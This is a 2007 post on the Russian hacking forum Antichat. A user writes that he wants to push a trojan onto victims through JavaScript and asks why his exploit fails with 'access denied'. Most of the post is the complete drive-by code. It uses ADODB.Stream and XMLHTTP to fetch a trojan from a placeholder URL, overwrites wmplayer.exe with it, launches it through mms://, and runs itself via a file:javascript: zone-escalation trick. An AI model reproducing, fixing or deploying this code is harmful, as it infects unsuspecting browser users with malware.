Форум АНТИЧАТ - ADODB.Stream Exploit+Троян

ADODB.Stream Exploit+Троян

12.11.2007, 21:04

kalpsik

Познающий

Регистрация: 10.01.2007

Сообщений: 67

Провел на форуме:
459846

Репутация: 63

Отправить сообщение для kalpsik с помощью ICQ

Отправить сообщение для kalpsik с помощью MSN

ADODB.Stream Exploit+Троян

люди, помогите немного плз...
решил впихнуть троя яваскриптом...
взгляд упал на ADODB эксплоит

Код:

<textarea id="code" style="display:none;">

    var x = new ActiveXObject("Microsoft.XMLHTTP");
    x.Open("GET", "путь к трою",0);
    x.Send();

    var s = new ActiveXObject("ADODB.Stream");
    s.Mode = 3;
    s.Type = 1;
    s.Open();
    s.Write(x.responseBody);

    s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
    location.href = "mms://";

</textarea>

<script language="javascript">

    function preparecode(code) {
        result = '';
        lines = code.split(/\r\n/);
        for (i=0;i<lines.length;i++) {

            line = lines[i];
            line = line.replace(/^\s+/,"");
            line = line.replace(/\s+$/,"");
            line = line.replace(/'/g,"\\'");
            line = line.replace(/[\\]/g,"\\\\");
            line = line.replace(/[/]/g,"%2f");

            if (line != '') {
                result += line +'\\r\\n';
            }
        }
        return result;
    }

    function doit() {
        mycode = preparecode(document.all.code.value);
        myURL = "file:javascript:eval('" + mycode + "')";
        window.open(myURL, "_media")
    }


    window.open("error.jsp","_media");

    setTimeout("doit()", 5000);


</script>

при проверке эксплоита получаю "отказано в доступе" на строке [b]window.open(myURL, "_media")[b]
подскажите плз че не так....